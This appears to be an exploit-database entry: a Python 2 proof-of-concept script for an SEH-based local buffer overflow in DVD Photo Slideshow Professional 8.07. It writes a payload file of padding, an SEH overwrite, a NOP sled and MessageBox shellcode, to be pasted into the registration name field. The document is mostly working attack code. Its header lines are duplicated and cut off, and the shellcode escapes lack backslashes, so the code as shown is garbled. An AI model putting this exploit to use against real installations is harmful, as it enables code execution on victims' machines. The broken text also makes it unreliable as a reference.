DVD Photo Slideshow Professional 8.07 Buffer Overflow

# Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-06
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.dvd-photo-slideshow.com/
# S # Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-06
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.dvd-photo-slideshow.com/
# Software:www.dvd-photo-slideshow.com/dps_install.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: DVD Photo Slideshow Professional 8.07
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

#!/bin/python

print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Click Help > Register... in tool bar
#5. Copy the contents of the file (Evil.txt)and paste in the Registration Name field
#6. Click Activate and BOOMMMM !!!! """

import struct

junk_byte = "A" * 256
nseh = "x90x90xebx10"
seh = struct.pack("<L",0x100152c9) # 0x100152c9 : pop edi # pop esi # ret
nop = "x90" *24

#Windows - MessageBox + Null-Free Shellcode (113 bytes) : BrokenByte

buf = ("x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
"x49x0bx31xc0x51x50xffxd7")

crash = "T" * (4000 -len(junk_byte+nseh+seh+nop+buf))
exploit = junk_byte + nseh + seh + nop + buf + crash
try:
f=open("Evil.txt","w")
f.write(exploit)
f.close()
except:
print "[+] File cannot be created"